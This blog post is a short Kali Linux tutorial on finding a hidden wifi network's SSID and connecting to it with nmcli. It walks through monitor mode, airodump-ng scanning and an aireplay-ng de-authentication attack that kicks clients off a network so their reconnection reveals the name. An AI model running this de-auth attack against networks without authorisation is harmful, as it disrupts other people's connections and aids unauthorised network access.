How to Find and Connect to Hidden Wifi Network

photo of a wi fi tower under a blue sky

Suppose you have a device that communicates using wifi, and you already know the password, but you can’t find the SSID name on your phone or computer. How can you connect? In this post, I will show you how to find and connect to the hidden network using Kali Linux.

Prerequisites

  • Kali Linux
  • Wifi adapter that supports monitor mode

Getting SSID Name

Make sure you have the wifi adapter that supports monitor mode. Alfa wifi adapter is well known for this feature. For 2.4 GHz, you can get AWUS036NH, and for 5 GHz, you can get AWUS036ACH.

Plug it in and set it to monitor mode. Change the wlan0 to your own wifi interface name.

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Run airodump-ng

airodump-ng wlan0

Now on the list, you will find some hidden network with hidden SSID that tells you how much character it is. There are two ways to gather the name of SSID, first is the passive way; you wait for the client to connect, which will take time and does not always work.

Or, the aggressive way, you just kick the client out of that network so they will reconnect again. Client connection will reveal the SSID name and will be saved by airodump-ng.

Now focus on which network you want to connect. Find the channel and restart airodump-ng with only scanning that specific channel

airodump-ng wlan0 --channel 1

Now let that scanning runs, and we will open the new terminal. Let’s start a de-authentication attack to kick out the clients on the network.

aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX wlan0

The parameter -0 means the de-authentication attack and 5 is the packet counts. While -a is the parameter for network BSSID that you want to de-auth while wlan0 is the network interface.

Once you launch the attack, the clients will be kicked out and reconnected, and the terminal with airodump-ng will reveal the name of the network SSID.

Remember, this attack does not work if no client is connected on the network.

Connecting to Hidden Network

Now we got the SSID name, we will just connect to it. Here I am using nmcli , and the network uses WEP. The password is already known.

nmcli c add type wifi con-name <conname> ifname wlan0 ssid <ssidname>

nmcli con modify <conname> wifi-sec.key-mgmt none

sudo nmcli c up <conname> --ask

I will post how I got the WEP password later when I have time. Have a nice connection! 🙂


Leave a Reply

Your email address will not be published. Required fields are marked *